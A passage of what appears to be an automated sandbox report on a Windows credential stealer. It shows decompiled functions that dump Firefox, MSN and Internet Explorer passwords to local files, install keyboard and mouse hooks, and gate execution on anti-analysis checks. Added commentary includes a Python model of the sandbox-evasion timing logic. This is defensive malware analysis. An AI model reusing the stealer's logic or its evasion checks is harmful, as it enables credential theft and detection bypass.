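                                    Run on the six lines above it reports the suspended CreateProcessA at 0040B77C, the local RWX probe at 00404159, the remote RWX commit at 00404186 and the WriteProcessMemory at 004041C8; VirtualFree and FindFirstFileA produce nothing. The VirtualAlloc finding is kept separate from the VirtualAllocEx one on purpose: the local probe-and-free before the remote allocation is a distinctive trait of this loader, and a rule that only watches the remote call would miss it.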

                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				void* _t49;
                                    				void* _t52;
                                    				long _t53;
                                    				void* _t55;
                                    				intOrPtr* _t65;
                                    				void* _t68;
                                    				long _t69;
                                    				char* _t80;
                                    				intOrPtr* _t93;
                                    				long _t97;
                                    				intOrPtr* _t100;
                                    				long _t104;
                                    				intOrPtr* _t107;
                                    				long _t111;
                                    				struct HINSTANCE__* _t114;
                                    				struct HINSTANCE__* _t117;
                                    				void* _t120;
                                    				void* _t209;
                                    				void* _t210;
                                    				void* _t211;
                                    				void* _t212;
                                    				void* _t213;
                                    				void* _t216;
                                    				void* _t217;
                                    				void* _t218;
                                    				void* _t219;
                                    				void* _t220;
                                    				void* _t221;
                                    				void* _t222;
                                    				intOrPtr _t229;
                                    				void* _t254;
                                    				void* _t255;
                                    				intOrPtr _t257;
                                    				intOrPtr _t258;
                                    				void* _t270;
                                    
                                    				_t255 = __esi;
                                    				_t254 = __edi;
                                    				_t257 = _t258;
                                    				_t213 = 0xb;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t213 = _t213 - 1;
                                    				} while (_t213 != 0);
                                    				E00403418(0x40bb04);
                                    				_push(_t257);
                                    				_push(0x40c0c4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t258;
                                    				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
                                    				_t209 = _t49;
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t209); // executed
                                    				} else {
                                    					CloseHandle(_t209);
                                    					Sleep(0x2ee0);
                                    				}
                                    				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    				_t210 = _t52;
                                    				_t53 = GetLastError();
                                    				_t261 = _t53 - 0xb7;
                                    				if(_t53 != 0xb7) {
                                    					CloseHandle(_t210);
                                    					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    					_t211 = _t55;
                                    					__eflags = GetLastError() - 0xb7;
                                    					if(__eflags != 0) {
                                    						CloseHandle(_t211);
                                    						L26:
                                    						E004013A4(1,  &_v80);
                                    						_t225 = "Restart";
                                    						E00401E94(_v80, "Restart");
                                    						if(__eflags != 0) {
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E00404604(_t213, __eflags);
                                    						E0040491C();
                                    						E0040B118(_t225, _t254, _t255);
                                    						_t65 =  *0x40d204; // 0x40e8f8
                                    						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed
                                    						_t212 = _t68;
                                    						_t69 = GetLastError();
                                    						__eflags = _t69 - 0xb7;
                                    						if(_t69 != 0xb7) {
                                    							CloseHandle(_t212); // executed
                                    						} else {
                                    							CloseHandle(_t212);
                                    							Sleep(0x3e8);
                                    							_t93 =  *0x40d204; // 0x40e8f8
                                    							_t212 = E00403568(0, 0, E00401F48( *_t93));
                                    							_t97 = GetLastError();
                                    							__eflags = _t97 - 0xb7;
                                    							if(_t97 != 0xb7) {
                                    								CloseHandle(_t212);
                                    							} else {
                                    								CloseHandle(_t212);
                                    								Sleep(0x3e8);
                                    								_t100 =  *0x40d204; // 0x40e8f8
                                    								_t212 = E00403568(0, 0, E00401F48( *_t100));
                                    								_t104 = GetLastError();
                                    								__eflags = _t104 - 0xb7;
                                    								if(_t104 != 0xb7) {
                                    									CloseHandle(_t212);
                                    								} else {
                                    									CloseHandle(_t212);
                                    									Sleep(0x3e8);
                                    									_t107 =  *0x40d204; // 0x40e8f8
                                    									_t212 = E00403568(0, 0, E00401F48( *_t107));
                                    									_t111 = GetLastError();
                                    									__eflags = _t111 - 0xb7;
                                    									if(_t111 != 0xb7) {
                                    										CloseHandle(_t212);
                                    									} else {
                                    										ExitProcess(0);
                                    									}
                                    								}
                                    							}
                                    						}
                                    						__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    						if( *((char*)( *0x40d1dc)) != 1) {
                                    							__eflags = 0;
                                    							E004013A4(0, 0x40f1e8);
                                    						} else {
                                    							E004013A4(0,  &_v88);
                                    							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
                                    							E00401B14(0x40f1e8, _v84);
                                    						}
                                    						E00406008( &_v92);
                                    						E00401D58( &_v92, "XX--XX--XX.txt");
                                    						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
                                    						_t80 =  *0x40d214; // 0x40e8f4
                                    						__eflags =  *_t80 - 1;
                                    						if(__eflags == 0) {
                                    							E0040B7FC(_t212, _t254, _t255, __eflags);
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E0040B3C0(_t212, _t213, _t254, _t255); // executed
                                    						L43:
                                    						_pop(_t229);
                                    						 *[fs:eax] = _t229;
                                    						_push(0x40c0cb);
                                    						return E00401AE4( &_v92, 0x12);
                                    					}
                                    					CloseHandle(_t211);
                                    					_t114 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0);
                                    					_t117 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xe, E0040B108, _t117, 0);
                                    					while(1) {
                                    						_t120 = E0040BA84(__eflags);
                                    						__eflags = _t120;
                                    						if(_t120 != 0) {
                                    							break;
                                    						}
                                    						E00405918();
                                    					}
                                    					ExitProcess(0);
                                    					goto L26;
                                    				}
                                    				CloseHandle(_t210);
                                    				E00409AD4( &_v24, _t210, _t255, _t261);
                                    				E00401B14(0x40f1ec, _v24);
                                    				_t262 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v28);
                                    					E00401D58( &_v28, "NOIP.abc");
                                    					_pop(_t222);
                                    					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
                                    				}
                                    				E00409D28( &_v32, _t210, _t254, _t255);
                                    				_t235 = _v32;
                                    				E00401B14(0x40f1ec, _v32);
                                    				_t263 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "MSN.abc");
                                    					_t235 =  *0x40f1ec;
                                    					_pop(_t221);
                                    					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
                                    				}
                                    				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
                                    				E00401B14(0x40f1ec, _v40);
                                    				_t264 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v44);
                                    					E00401D58( &_v44, "FIREFOX.abc");
                                    					_pop(_t220);
                                    					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
                                    				}
                                    				E00409A84( &_v48);
                                    				E00401B14(0x40f1ec, _v48);
                                    				_t265 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v52);
                                    					E00401D58( &_v52, "IELOGIN.abc");
                                    					_pop(_t219);
                                    					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
                                    				}
                                    				E00409A90( &_v56);
                                    				E00401B14(0x40f1ec, _v56);
                                    				_t266 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v60);
                                    					E00401D58( &_v60, "IEPASS.abc");
                                    					_pop(_t218);
                                    					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
                                    				}
                                    				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
                                    				E00401B14(0x40f1ec, _v64);
                                    				_t267 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v68);
                                    					E00401D58( &_v68, "IEAUTO.abc");
                                    					_pop(_t217);
                                    					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
                                    				}
                                    				E00409AB8( &_v72, _t254, _t255, _t267);
                                    				E00401B14(0x40f1ec, _v72);
                                    				_t268 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v76);
                                    					E00401D58( &_v76, "IEWEB.abc");
                                    					_pop(_t216);
                                    					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
                                    				}
                                    				goto L43;
                                    			}

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E0040B118(void* __edx, void* __edi, void* __esi) {
                                    				void* __ebx;
                                    				char* _t1;
                                    				char* _t2;
                                    				char* _t3;
                                    				char* _t4;
                                    				char* _t5;
                                    				char* _t6;
                                    				char* _t7;
                                    				char* _t8;
                                    				char* _t9;
                                    				char* _t10;
                                    				char* _t11;
                                    				char* _t12;
                                    				char* _t13;
                                    				long _t15;
                                    				void* _t49;
                                    				long _t58;
                                    				void* _t62;
                                    				void* _t63;
                                    				intOrPtr* _t64;
                                    
                                    				_t63 = __esi;
                                    				_t62 = __edi;
                                    				_t1 =  *0x40d1d4; // 0x40e8e0
                                    				if( *_t1 == 1 && E004052EC() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t2 =  *0x40d1b0; // 0x40e8e1
                                    				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t3 =  *0x40d1fc; // 0x40e8e2
                                    				if( *_t3 == 1 && E00405124() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t4 =  *0x40d1ac; // 0x40e8e3
                                    				_t71 =  *_t4 - 1;
                                    				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t5 =  *0x40d1f4; // 0x40e8e4
                                    				if( *_t5 == 1 && E00405310() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t6 =  *0x40d1c8; // 0x40e8e5
                                    				if( *_t6 == 1 && E004054A4() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t7 =  *0x40d1d0; // 0x40e8e6
                                    				if( *_t7 == 1 && E004053EC() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t8 =  *0x40d1c0; // 0x40e8e7
                                    				if( *_t8 == 1 && E00405334() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t9 =  *0x40d1f8; // 0x40e8e8
                                    				_t81 =  *_t9 - 1;
                                    				if( *_t9 == 1) {
                                    					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
                                    					if(_t49 == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				_t10 =  *0x40d1bc; // 0x40e8e9
                                    				if( *_t10 == 1 && E0040588C() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t11 =  *0x40d1b4; // 0x40e8ea
                                    				if( *_t11 == 1 && E004056C0() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t12 =  *0x40d200; // 0x40e8eb
                                    				if( *_t12 == 1) {
                                    					_t58 = GetTickCount();
                                    					if(E00405750(L00405168) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004051CC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004052EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405310) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405334) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004053EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004054A4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040555C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056DC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405770) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004057B4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040588C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056C0) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405124) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E004056DC(_t58) == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				_t13 =  *0x40d200; // 0x40e8eb
                                    				if( *_t13 != 1) {
                                    					L70:
                                    					return _t13;
                                    				} else {
                                    					E00405770();
                                    					_t15 = GetTickCount();
                                    					_push(0);
                                    					asm("cdq");
                                    					 *_t64 =  *_t64 - _t58;
                                    					asm("sbb [esp+0x4], edx");
                                    					_t13 = _t15;
                                    					if(0 != 0) {
                                    						if(0 <= 0) {
                                    							goto L70;
                                    						}
                                    						L69:
                                    						ExitProcess(0);
                                    						return _t13;
                                    					}
                                    					if(_t13 <= 0x1388) {
                                    						goto L70;
                                    					}
                                    					goto L69;
                                    				}
                                    			}
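E0040B118 above is the sample's anti-analysis gate: twelve one-byte switches at 0x40E8E0..0x40E8EB each enable one check routine (only the first, E004052EC, is identifiable from the page, as a GetModuleHandleA lookup of "SbieDll.dll"), and the last switch turns on a timed pass in which every routine is run through E00405750 and the GetTickCount delta across the whole pass must not exceed 0x1388 (5000 ms), otherwise ExitProcess(0) is called. The following Python is an added model of that decision logic for analysts who want to reason about which configuration or which sandbox latency would make the sample terminate; it is not code from the sample, from Joe Sandbox or from any project. The memory-dump layout (virtual address minus dump base), the modulo-2^32 handling of the tick delta, and the constructed dump buffer are assumptions.

```python
"""Decision model of the anti-analysis gate E0040B118 (added illustration;
not code from the sample or from the sandbox report)."""

FLAG_BASE_VA = 0x40E8E0      # twelve 1-byte switches at 0x40E8E0..0x40E8EB
TICK_LIMIT_MS = 0x1388       # 5000 ms budget for the timed pass

# Order in which E0040B118 consults the first eleven switches.  Only the
# first routine's purpose is visible on the page (GetModuleHandleA on
# "SbieDll.dll"); the others are labelled by address only.
FLAGGED_CHECKS = [
    "E004052EC",  # SbieDll.dll (Sandboxie) module check
    "L00405168", "E00405124", "E004051CC", "E00405310", "E004054A4",
    "E004053EC", "E00405334", "E0040555C", "E0040588C", "E004056C0",
]
# Routines the timed pass (switch at 0x40E8EB) runs through E00405750, in
# order; three of them are never gated by an individual switch.
TIMED_CHECKS = [
    "L00405168", "E004051CC", "E004052EC", "E00405310", "E00405334",
    "E004053EC", "E004054A4", "E0040555C", "E004056DC", "E00405770",
    "E004057B4", "E0040588C", "E004056C0", "E00405124",
]


def read_flags(dump: bytes, dump_base: int) -> dict:
    """Pull the twelve switches out of a memory dump.

    Assumption: the dump is image-shaped, so a virtual address maps to
    offset VA - dump_base.  A raw PE file would need section mapping first.
    """
    off = FLAG_BASE_VA - dump_base
    if off < 0 or off + 12 > len(dump):
        raise ValueError("flag table lies outside the dump")
    raw = dump[off:off + 12]
    flags = {name: raw[i] == 1 for i, name in enumerate(FLAGGED_CHECKS)}
    flags["timed"] = raw[11] == 1          # E0040B118 tests for exactly 1
    return flags


def gate_decision(flags: dict, results: dict, start_tick: int, end_tick: int) -> str:
    """Return 'exit' where E0040B118 would call ExitProcess(0), else 'continue'.

    results maps routine name -> return value (1 means 'analysis detected').
    start_tick/end_tick are the two GetTickCount readings around the timed
    pass; reducing their difference mod 2**32 is an assumption about the
    intent of the cdq/sbb sequence in the decompiled code.
    """
    # First pass: every individually enabled check may terminate the process.
    for name in FLAGGED_CHECKS:
        if flags.get(name) and results.get(name, 0) == 1:
            return "exit"
    if not flags.get("timed"):
        return "continue"
    # Timed pass: all routines run regardless of their own switch, and any
    # nonzero result is fatal (E004056DC is additionally called with the
    # start tick; the same result is assumed for both invocations).
    for name in TIMED_CHECKS:
        if results.get(name, 0) != 0:
            return "exit"
    elapsed = (end_tick - start_tick) & 0xFFFFFFFF
    return "exit" if elapsed > TICK_LIMIT_MS else "continue"


if __name__ == "__main__":
    # Constructed 64 KiB image-shaped dump with the Sandboxie and timed switches set.
    image = bytearray(0x10000)
    image[FLAG_BASE_VA - 0x400000] = 1
    image[FLAG_BASE_VA - 0x400000 + 11] = 1
    cfg = read_flags(bytes(image), 0x400000)
    print({k: v for k, v in cfg.items() if v})
    print(gate_decision(cfg, {}, 1000, 1000 + 5001))   # slow sandbox: exit
```

The practical reading for a sandbox operator: with the timed switch set, no check has to succeed for the sample to bail out; hooking or single-stepping that stretches the fourteen routines past five seconds is enough.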

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                    				intOrPtr _v20;
                                    				long _v24;
